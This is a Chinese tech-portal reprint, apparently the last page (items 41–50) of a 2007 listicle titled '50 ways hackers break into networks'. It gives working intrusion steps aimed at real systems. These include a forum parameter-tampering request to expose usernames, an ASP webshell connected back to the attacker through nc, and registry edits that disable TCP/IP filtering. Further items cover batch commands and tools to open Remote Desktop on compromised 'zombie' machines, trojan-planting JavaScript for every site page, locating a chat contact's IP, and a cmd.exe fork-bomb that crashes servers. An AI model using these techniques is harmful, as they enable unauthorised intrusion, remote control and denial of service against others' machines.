经验总结:黑客入侵网络的50种方法

互联网 | 编辑: 杨剑锋 2007-08-28 00:30:00转载 一键看全文

黑客入侵网络的50种方法

41.内网控制内网 用vidc 还要有一只肉鸡

http://soft.anqn.com/62/20050608/6878.html

42.有许多管理员用备份的日期做备份数据库的名字

比如http://www.anqn.com/bbs/databackup/20050601.mdb

43.动网数据库oldusername=%B5%F0%B7%C0&username2=%B5%F0%B7%C0&password2=19841202&adduser=%B5%F0%B7%C0&id=12&Submit=%B8%FC+%D0%C2

不知道用户名(不是%B8%F0%B7%C0) 转化这个用他本身的页面

http://www.anqn.com/bbs/showerr.asp?BoardID=0&ErrCodes=10,11&action=%CC%EE%D0%B4%B5%C7%C2%BC%D0%C5%CF%A2

%CC%EE%D0%B4%B5%C7%C2%BC%D0%C5%CF%A2这句话意思是“填写登录信息”

那么就把%CC%EE%D0%B4%B5%C7%C2%BC%D0%C5%CF%A2换成%B5%F0%B7%C0 可以看到用户名

44.对付信息监控系统 木马必须是加密的 如net user用不了就用net1 user等等 我是大连的 大连这边主机用这方法好用 可以直接传加密的马 用用黑基tyrant的方法 上传一个cmd的aspshall 用nc连接自己的nc监听端口 在web目录下写个加ftp用户的txt 本地43958用nc提交 ftp到服务器加用户

45.解决TCP/IP筛选 在注册表里有三处,分别是:

HKEY_LOCAL_MACHINESYSTEMControlSet001ServicesTcpip

HKEY_LOCAL_MACHINESYSTEMControlSet002ServicesTcpip

HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesTcpip

分别用

regedit -e D:a.reg HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesTcpip

regedit -e D:b.reg HKEY_LOCAL_MACHINESYSTEMControlSet002ServicesTcpip

regedit -e D:c.reg HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesTcpip

命令来导出注册表项

然后把三个文件里的EnableSecurityFilters"=dword:00000001,

改成EnableSecurityFilters"=dword:00000000 再将以上三个文件分别用

regedit -s D:a.reg regedit -s D:b.reg regedit -s D:c.reg 导入注册表即可

46.使CHM木马无法在本地运行木马程序 将注册表"HKEY_CURRENT_U

SERSoftwareMicrosoftWindowsCurrentVersionInternet SettingsZones"下的1004项的值由原来十进制的0改为十六进制的3。

47.开3389的5种方法

(1)打开记事本,编辑内容如下:

echo [Components] > c:sql

echo TSEnable = on >> c:sql

sysocmgr /i:c:winntinfsysoc.inf /u:c:sql /q

编辑好后存为BAT文件,上传至肉鸡,执行。

(2) (对xp2000都有效) 脚本文件 本地开3389 工具:rots1.05

下载地址:www.netsill.com/rots.zip

在命令行方式下使用windows自带的脚本宿主程序cscript.exe调用脚本,例如:

c:>cscript ROTS.vbs <目标IP> <用户名> <密码> [服务端口] [/r]

如果要对本地使用,IP地址为127.0.0.1或者一个点(用.表示),用户名和密码都为空(用 ""表示)。

(3)djshao正式版5.0

解压djshao5.0.zip,用你的随便什么方法把把解压出来的djxyx*.**e上传到肉鸡的c:winnttemp下,然后 进入c:winnttemp目录执行djxyx*.**e解压缩文件,然后再执行解压缩出来的azzd.exe文件,等一会肉鸡 会自动重启!重启后会出现终端服务

(4)下载DameWare NT Utilities 3.66.0.0 注册版

地址www.netsill.com/dwmrcw36600.zip

安装注册完毕后输入对方IP用户名密码,等待出现是否安装的对话框点是。

复制启动后出现对方桌面。

在对方桌面进入控制面版,点添加或删除程序。进入后点添加/删除windows组件,找到终端服务,点际进入 后在启动终端服务上打上勾。确定自动提示重起,重起后OK

(5)大家最常用的 3389.exe 下载地址www.anqn.com 把程序上传到肉鸡运行后重启既可

48.QQ上得到别人的IP

一般跟别人聊天 如果是对方先对你说话 那么她的IP显示出来的概率就大

当然如果是我们找对方 可以先跟她说发过去消息之后 然后关闭窗口等待她的回复

还可以用天网防火墙选择上UDP数据保检测,即可拦截到对方ip

49.挂马js代码document.write(’’);保存到js页面里 可让所有页面挂马

50.让服务器重启

写个bat死循环:

@echo off

:loop1

cls

start cmd.exe

goto loop1

保存成bat guset权限就可以运行 运行后很快服务器就会死机 管理员自然会去重启

 

提示:试试键盘 “← →” 可以实现快速翻页 

总共 3 页< 上一页123
一键看全文

本文导航

相关阅读

每日精选

点击查看更多

首页 手机 数码相机 笔记本 游戏 DIY硬件 硬件外设 办公中心 数字家电 平板电脑